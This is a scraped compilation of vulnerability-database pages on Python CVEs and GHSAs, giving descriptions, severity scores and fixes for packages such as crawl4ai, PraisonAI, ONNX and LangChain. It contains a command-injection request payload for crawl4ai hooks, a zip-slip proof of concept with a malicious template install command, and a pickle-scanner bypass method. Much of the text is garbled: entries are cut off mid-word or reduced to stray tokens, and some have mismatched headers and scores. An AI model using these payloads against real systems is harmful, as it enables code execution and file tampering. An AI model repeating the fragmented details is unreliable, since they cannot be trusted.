Python vulnerability analysis and mitigation
OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In CompositeDeepScanLine::readPixels, per-pixel totals are accumulated in vector total_sizes for attacker-controlled large counts across many parts, total_sizes[ptr] wraps modulo 2^32. overall_sample_count is then derived from wrapped totals and used in samples[channel].resize(overall_sample_count). Decode pointer setup/consumption proceeds with true sample counts, and write operations in core unpack (generic_unpack_deep_pointers) overrun the undersized composite sample buffer. This vulnerability is fixed in v3.2.6, v3.3.8, and v3.4.6.
Source : NVD
## 8.4
Score
Published Marc
Wiz
GHSA-5882-5rx9-xgxp Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-5882-5rx9-xgxp Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-5882-5rx9-xgxp :
Python vulnerability analysis and mitigation
/crawl
hooks
exec()
__import__
POST /crawl
{
"urls": ["https://example.com"],
"hooks": {
"code": {
"on_page_context_created": "async def hook(page, context, **kwargs):\n __import__('os').system('malicious_command')\n return page"
}
}
}
## Impact
An unauthenticated attacker can:
Execute arbitrary system commands
Read/write files on the server
Exfiltrate sensitive data (environment variables, API keys)
Pivot to internal network services
Completely compromise the server
## Mitigation
Upgrade to v0.8.0 (recommended)
Disable the Docker API
/crawl
Add authentication to the API
## Fix Details
__import__
allowed_builtins
hook_manager.py
CRAWL4AI_HOOKS_ENABLED=false
Users must explicitly opt-in to en
Wiz
CVE-2026-30242 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.5
CVE-2026-30242 [HIGH] CVE-2026-30242 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30242 :
Python vulnerability analysis and mitigation
Plane is an an open-source project management tool. Prior to version 1.2.3, the webhook URL validation in plane/app/serializers/webhook.py only checks ip.is_loopback, allowing attackers with workspace ADMIN role to create webhooks pointing to private/internal network addresses (10.x.x.x, 172.16.x.x, 192.168.x.x, 169.254.169.254, etc.). When webhook events fire, the server makes requests to these internal addresses and stores the response — enabling SSRF with full response read-back. This issue has been patched in version 1.2.3.
Source : NVD
## 8.5
Score
Published March 6, 2026
Severity HIGH
CNA Score 8.5
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA K
Wiz
CVE-2025-69662 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2025-69662 [HIGH] CVE-2025-69662 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-69662 :
Python vulnerability analysis and mitigation
SQL injection vulnerability in geopandas before v.1.1.2 allows an attacker to obtain sensitive information via the to_postgis()` function being used to write GeoDataFrames to a PostgreSQL database.
Source : NVD
## 8.6
Score
Published January 30, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Python
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
python-geopandas
geopandas
Sources
NVD
Debian 11, 12, 13 Severity HIGH No Fix Added at: Jan 30, 2026
Debian 14 Severity HIGH Has Fix Added at: Jan 30, 2026
Echo Severity HIGH No
Wiz
CVE-2026-33641 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-33641 [HIGH] CVE-2026-33641 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33641 :
Python vulnerability analysis and mitigation
Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.3, Glances supports dynamic configuration values in which substrings enclosed in backticks are executed as system commands during configuration parsing. This behavior occurs in Config.get_value() and is implemented without validation or restriction of the executed commands. If an attacker can modify or influence configuration files, arbitrary commands will execute automatically with the privileges of the Glances process during startup or configuration reload. In deployments where Glances runs with elevated privileges (e.g., as a system service), this may lead to privilege escalation. This issue has been patched in version 4.5.3.
Source :
Wiz
CVE-2026-23842 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-23842 [HIGH] CVE-2026-23842 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23842 :
Python vulnerability analysis and mitigation
ChatterBot is a machine learning, conversational dialog engine for creating chat bots. ChatterBot versions up to 1.2.10 are vulnerable to a denial-of-service condition caused by improper database session and connection pool management. Concurrent invocations of the get_response() method can exhaust the underlying SQLAlchemy connection pool, resulting in persistent service unavailability and requiring a manual restart to recover. Version 1.2.11 fixes the issue.
Source : NVD
## 7.5
Score
Published January 19, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.8
Wiz
CVE-2026-34953 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-34953 [CRITICAL] CVE-2026-34953 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34953 :
Python vulnerability analysis and mitigation
PraisonAI is a multi-agent teams system. Prior to version 4.5.97, OAuthManager.validate_token() returns True for any token not found in its internal store, which is empty by default. Any HTTP request to the MCP server with an arbitrary Bearer token is treated as authenticated, granting full access to all registered tools and agent capabilities. This issue has been patched in version 4.5.97.
Source : NVD
## 9.1
Score
Published April 3, 2026
Severity CRITICAL
CNA Score 9.1
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
p
Wiz
GHSA-5hr4-253g-cpx2 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-5hr4-253g-cpx2 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-5hr4-253g-cpx2 :
Python vulnerability analysis and mitigation
## Summary
## 6.9
Score
Published April 4, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
web3
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Apr 05, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
CVE-2026-35615
CRITICAL
9.2
Python
praiso
Wiz
GHSA-4f84-67cv-qrv3 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-4f84-67cv-qrv3 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-4f84-67cv-qrv3 :
Python vulnerability analysis and mitigation
dydx-v4-client
exec()
dydx-v4-client
Source : NVD
## 9.3
Score
Published February 6, 2026
Severity CRITICAL
CNA Score N/A
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
dydx-v4-client
Sources
NVD
pip Severity CRITICAL Has Fix Added at: Feb 08, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Pu
Wiz
CVE-2026-4229 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
CVE-2026-4229 [CRITICAL] CVE-2026-4229 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4229 :
Python vulnerability analysis and mitigation
A flaw has been found in vanna-ai vanna up to 2.0.2. This impacts the function remove_training_data of the file src/vanna/legacy/google/bigquery_vector.py. This manipulation of the argument ID causes sql injection. The attack can be initiated remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
## 6.9
Score
Published March 16, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
vanna
So
Wiz
CVE-2026-25505 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-25505 [CRITICAL] CVE-2026-25505 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25505 :
Python vulnerability analysis and mitigation
Bambuddy is a self-hosted print archive and management system for Bambu Lab 3D printers. Prior to version 0.1.7, a hardcoded secret key used for signing JWTs is checked into source code and ManyAPI routes do not check authentication. This issue has been patched in version 0.1.7.
Source : NVD
## 9.8
Score
Published February 4, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 30.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
bambuddy
Sources
NVD
pip Severity CRITICAL Has Fix Added at: Feb 03, 2026
## Get a CVE risk assessment
Wiz
CVE-2026-33175 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-33175 [HIGH] CVE-2026-33175 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33175 :
Python vulnerability analysis and mitigation
OAuthenticator is software that allows OAuth2 identity providers to be plugged in and used with JupyterHub. Prior to version 17.4.0, an authentication bypass vulnerability in oauthenticator allows an attacker with an unverified email address on an Auth0 tenant to login to JupyterHub. When email is used as the usrname_claim, this gives users control over their username and the possibility of account takeover. This issue has been patched in version 17.4.0.
Source : NVD
## 8.8
Score
Published April 3, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 26.9
Ex
Wiz
CVE-2026-27794 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.6
CVE-2026-27794 [MEDIUM] CVE-2026-27794 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27794 :
Python vulnerability analysis and mitigation
BaseCache
CachePolicy
langgraph-checkpoint
BaseCache
JsonPlusSerializer(pickle_fallback=True)
pickle.loads(...)
cache=...
StateGraph.compile(...)
BaseCache
CachePolicy
Source : NVD
## 6.6
Score
Published February 25, 2026
Severity MEDIUM
CNA Score 6.6
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 57.5
Exploitation Probability (EPSS) 0.4
Affected packages and libraries
langgraph-checkpoint
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Mar 02, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just w
Wiz
CVE-2025-68398 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2025-68398 [CRITICAL] CVE-2025-68398 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68398 :
Python vulnerability analysis and mitigation
Weblate is a web based localization tool. In versions prior to 5.15.1, it was possible to overwrite Git configuration remotely and override some of its behavior. Version 5.15.1 fixes the issue.
Source : NVD
## 9.1
Score
Published December 18, 2025
Severity CRITICAL
CNA Score 9.1
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 46.9
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
weblate
Sources
NVD
pip Severity CRITICAL Has Fix Added at: Dec 21, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, no
Wiz
GHSA-q56x-g2fj-4rj6 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-q56x-g2fj-4rj6 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-q56x-g2fj-4rj6 :
Python vulnerability analysis and mitigation
## Summary
save_external_data
## Details
## TOCTOU
The vulnerable code pattern:
# CHECK - Is this a file?
if not os.path.isfile(external_data_file_path):
# Line 228-229: USE #1 - Create if it doesn't exist
with open(external_data_file_path, "ab"):
pass
# Open for writing
with open(external_data_file_path, "r+b") as data_file:
# Lines 233-243: Write tensor data
data_file.seek(0, 2)
if info.offset is not None:
file_size = data_file.tell()
if info.offset > file_size:
data_file.write(b"\0" * (info.offset - file_size))
data_file.seek(info.offset)
offset = data_file.tell()
data_file.write(tensor.raw_data)
os.path.isfile
open
O_EXCEL | O_CREAT
O_NOFOLLOW
## Bypass
C:\
if location_path.is_absolute() and len(
Wiz
CVE-2025-67748 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2025-67748 [HIGH] CVE-2025-67748 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67748 :
Python vulnerability analysis and mitigation
pty
pty.spawn()
LIKELY_SAFE
Source : NVD
## 7.1
Score
Published December 16, 2025
Severity HIGH
CNA Score 7.1
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
fickling
Sources
NVD
pip Severity HIGH Has Fix Added at: Dec 16, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
CVE-2026-356
Wiz
CVE-2026-29038 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-29038 [MEDIUM] CVE-2026-29038 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29038 :
Python vulnerability analysis and mitigation
changedetection.io is a free open source web page change detection tool. Prior to version 0.54.4, there is a reflected cross-site scripting (XSS) vulnerability identified in the /rss/tag/ endpoint of changedetection.io. The tag_uuid path parameter is reflected directly in the HTTP response body without HTML escaping. Since Flask returns text/html by default for plain string responses, the browser parses and executes injected JavaScript. This issue has been patched in version 0.54.4.
Source : NVD
## 6.1
Score
Published March 6, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability P
Wiz
CVE-2026-34447 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-34447 [MEDIUM] CVE-2026-34447 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34447 :
Python vulnerability analysis and mitigation
Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. Prior to version 1.21.0, there is a symlink traversal vulnerability in external data loading allows reading files outside the model directory. This issue has been patched in version 1.21.0.
Source : NVD
## 5.5
Score
Published April 1, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
py3-onnx
onnx
Sources
NVD
Chainguard Has Fix Added at: Apr 05, 2026
Debian 11, 12, 13, 14 Severity M
Wiz
CVE-2026-26981 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-26981 [MEDIUM] CVE-2026-26981 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26981 :
Python vulnerability analysis and mitigation
istream_nonparallel_read
ImfContextInit.cpp
IStream
size_t
memcpy
Source : NVD
## 6.5
Score
Published February 24, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
openexr
mingw32-openexr-debuginfo
Sources
NVD
Alpine 3.21, 3.22, 3.23, edge Severity MEDIUM No Fix Added at: Mar 02, 2026
Chainguard Has Fix Added at: Mar 02, 2026
pip Severity MEDIUM Has Fix Added at: Apr 06, 2026
Homebrew Severity MEDIUM Has Fix Added at: Mar 03, 2026
Nix Severity MEDIUM Has Fix Added at
Wiz
CVE-2026-35187 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.7
CVE-2026-35187 [HIGH] CVE-2026-35187 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35187 :
Python vulnerability analysis and mitigation
pyLoad is a free and open-source download manager written in Python. In 0.5.0b3.dev96 and earlier, the parse_urls API function in src/pyload/core/api/ init .py fetches arbitrary URLs server-side via get_url(url) (pycurl) without any URL validation, protocol restriction, or IP blacklist. An authenticated user with ADD permission can make HTTP/HTTPS requests to internal network resources and cloud metadata endpoints, read local files via file:// protocol (pycurl reads the file server-side), interact with internal services via gopher:// and dict:// protocols, and enumerate file existence via error-based oracle (error 37 vs empty response).
Source : NVD
## 7.7
Score
Published April 6, 2026
Severity HIGH
CNA Score 7.7
A
Wiz
CVE-2026-39308 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-39308 [HIGH] CVE-2026-39308 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39308 :
Python vulnerability analysis and mitigation
## Summary
manifest.json
name
version
../
400
## Details
The bug is caused by the order of operations between the HTTP handler and the registry storage layer.
RegistryServer._handle_publish()
src/praisonai/praisonai/recipe/server.py:370-426
POST /v1/recipes/{name}/{version}
.praison
result = self.registry.publish(tmp_path, force=force)
LocalRegistry.publish()
src/praisonai/praisonai/recipe/registry.py:214-287
manifest.json
name
version
name = manifest.get("name")
version = manifest.get("version")
recipe_dir = self.recipes_path / name / version
recipe_dir.mkdir(parents=True, exist_ok=True)
bundle_name = f"{name}-{version}.praison"
dest_path = recipe_dir / bundle_name
shutil.copy2(bundle_path, dest_path)
Wiz
CVE-2026-4506 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
CVE-2026-4506 [CRITICAL] CVE-2026-4506 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4506 :
Python vulnerability analysis and mitigation
A vulnerability was found in Mindinventory MindSQL up to 0.2.1. Impacted is the function ask_db of the file mindsql/core/mindsql_core.py. Performing a manipulation results in code injection. The attack can be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
## 5.3
Score
Published March 20, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mindsql
Sources
NVD
pip Seve
Wiz
CVE-2026-2531 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-2531 [MEDIUM] CVE-2026-2531 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2531 :
Python vulnerability analysis and mitigation
A security vulnerability has been detected in MindsDB up to 25.14.1. This vulnerability affects the function clear_filename of the file mindsdb/utilities/security.py of the component File Upload. Such manipulation leads to server-side request forgery. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. The name of the patch is 74d6f0fd4b630218519a700fbee1c05c7fd4b1ed. It is best practice to apply a patch to resolve this issue.
Source : NVD
## 5.3
Score
Published February 16, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentil
Wiz
CVE-2026-27982 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2026-27982 [MEDIUM] CVE-2026-27982 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27982 :
Python vulnerability analysis and mitigation
An open redirect vulnerability exists in django-allauth versions prior to 65.14.1 when SAML IdP initiated SSO is enabled (it is disabled by default), which may allow an attacker to redirect users to an arbitrary external website via a crafted URL.
Source : NVD
## 5.1
Score
Published March 5, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
Python
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
django-allauth
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Mar 08, 2026
Debian 14 Severity MEDIUM Has Fix Added at
Wiz
CVE-2025-33245 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.0
CVE-2025-33245 [HIGH] CVE-2025-33245 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-33245 :
Python vulnerability analysis and mitigation
NVIDIA NeMo Framework contains a vulnerability where malicious data could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.
Source : NVD
## 8.8
Score
Published February 18, 2026
Severity HIGH
CNA Score 8.0
Affected Technologies
Python
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 52.4
Exploitation Probability (EPSS) 0.3
Affected packages and libraries
nemo-toolkit
nemo
Sources
NVD
pip Severity HIGH Has Fix Added at: Feb 21, 2026
Nix Severity HIGH Has Fix Added at: Feb 24, 2026
## Get
Wiz
CVE-2026-28370 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-28370 [CRITICAL] CVE-2026-28370 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28370 :
Python vulnerability analysis and mitigation
In the query parser in OpenStack Vitrage before 12.0.1, 13.0.0, 14.0.0, and 15.0.0, a user allowed to access the Vitrage API may trigger code execution on the Vitrage service host as the user the Vitrage service runs under. This may result in unauthorized access to the host and further compromise of the Vitrage service. All deployments exposing the Vitrage API are affected. This occurs in _create_query_function in vitrage/graph/query.py.
Source : NVD
## 9.1
Score
Published February 27, 2026
Severity CRITICAL
CNA Score 9.1
Affected Technologies
Python
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8
Exploi
Wiz
CVE-2026-27641 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-27641 [CRITICAL] CVE-2026-27641 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27641 :
Python vulnerability analysis and mitigation
name
name
Source : NVD
## 9.8
Score
Published February 25, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 40.7
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
flask-reuploaded
Sources
NVD
pip Severity CRITICAL Has Fix Added at: Mar 02, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
CVE-2026-35615
Wiz
CVE-2026-34231 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-34231 [MEDIUM] CVE-2026-34231 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34231 :
Python vulnerability analysis and mitigation
Slippers is a UI component framework for Django. Prior to version 0.6.3, a Cross-Site Scripting (XSS) vulnerability exists in the {% attrs %} template tag of the slippers Django package. When a context variable containing untrusted data is passed to {% attrs %}, the value is interpolated into an HTML attribute string without escaping, allowing an attacker to break out of the attribute context and inject arbitrary HTML or JavaScript into the rendered page. This issue has been patched in version 0.6.3.
Source : NVD
## 6.1
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploit
Wiz
GHSA-84r2-jw7c-4r5q Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-84r2-jw7c-4r5q Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-84r2-jw7c-4r5q :
Python vulnerability analysis and mitigation
## Summary
Currently picklescanner only blocks some specific functions of the pydoc and operator modules. Attackers can use other functions within these allowed modules to go through undetected and achieve RCE on the final user. Particularly
pydoc.locate: Can dynamically resolve and import arbitrary modules (e.g., resolving the string "os" to the actual os module).
operator.methodcaller: Allows executing a method on an object. When combined with a resolved module object, it can execute functions like system.Since locate and methodcaller are not explicitly listed in the deny-list, picklescan treats them as "Safe" or "Suspicious" (depending on configuration) but does not flag them as "Dangerous", allowing the malicio
Wiz
CVE-2026-39307 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
CVE-2026-39307 [CRITICAL] CVE-2026-39307 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39307 :
Python vulnerability analysis and mitigation
zipfile.extractall()
## Details
src/praisonai/praisonai/cli/features/templates.py
zip_ref.extractall(tmpdir)
zip_ref.extractall(tmpdir)
../../../../tmp/evil.sh
extractall
## PoC
Generate a malicious zip payload:
import zipfile
with zipfile.ZipFile('malicious_template.zip', 'w') as z:
# Adding a file that traverses directories
z.writestr('../../../../../../../tmp/zip_slip_pwned.txt', 'pwned by zip slip')
Trick a user into installing the malicious template:
praisonai templates install github:attacker/malicious_template
zip_slip_pwned.txt
/tmp/
## Impact
This is an Arbitrary File Write vulnerability affecting any user who installs community templates. It can be leveraged to overwrite system files, user dot
Wiz
CVE-2025-68664 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
CVE-2025-68664 [CRITICAL] CVE-2025-68664 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68664 :
Python vulnerability analysis and mitigation
LangChain is a framework for building agents and LLM-powered applications. Prior to versions 0.3.81 and 1.2.5, a serialization injection vulnerability exists in LangChain's dumps() and dumpd() functions. The functions do not escape dictionaries with 'lc' keys when serializing free-form dictionaries. The 'lc' key is used internally by LangChain to mark serialized objects. When user-controlled data contains this key structure, it is treated as a legitimate LangChain object during deserialization rather than plain user data. This issue has been patched in versions 0.3.81 and 1.2.5.
Source : NVD
## 8.2
Score
Published December 23, 2025
Severity HIGH
CNA Score 9.3
High-profile Vulnerability Yes
Affected Technologies
P
Wiz
CVE-2026-25738 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-25738 [MEDIUM] CVE-2026-25738 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25738 :
Python vulnerability analysis and mitigation
http_proxy
https_proxy
Source : NVD
## 6.9
Score
Published February 19, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 23.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
indico
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Feb 18, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
CVE-2026-35615
Wiz
CVE-2026-34939 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-34939 [MEDIUM] CVE-2026-34939 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34939 :
Python vulnerability analysis and mitigation
PraisonAI is a multi-agent teams system. Prior to version 4.5.90, MCPToolIndex.search_tools() compiles a caller-supplied string directly as a Python regular expression with no validation, sanitization, or timeout. A crafted regex causes catastrophic backtracking in the re engine, blocking the Python thread for hundreds of seconds and causing a complete service outage. This issue has been patched in version 4.5.90.
Source : NVD
## 6.5
Score
Published April 3, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12
Exploitation Probability (EPSS) N/A
Affected pack
Wiz
GHSA-j48q-4c78-rhf9 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-j48q-4c78-rhf9 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-j48q-4c78-rhf9 :
Python vulnerability analysis and mitigation
## Severity: HIGH
## Summary
openssl_encrypt/modules/registry/hash_registry.py
.so
importlib
## Affected Code
for site_pkg in site.getsitepackages():
pattern = os.path.join(site_pkg, "whirlpool*py313*.so")
py313_modules = glob.glob(pattern)
if py313_modules:
module_path = py313_modules[0] # Takes first match
loader = ExtensionFileLoader("whirlpool", module_path)
spec = importlib.util.spec_from_file_location("whirlpool", module_path, loader=loader)
whirlpool_module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(whirlpool_module)
## Impact
"whirlpool*py313*.so"
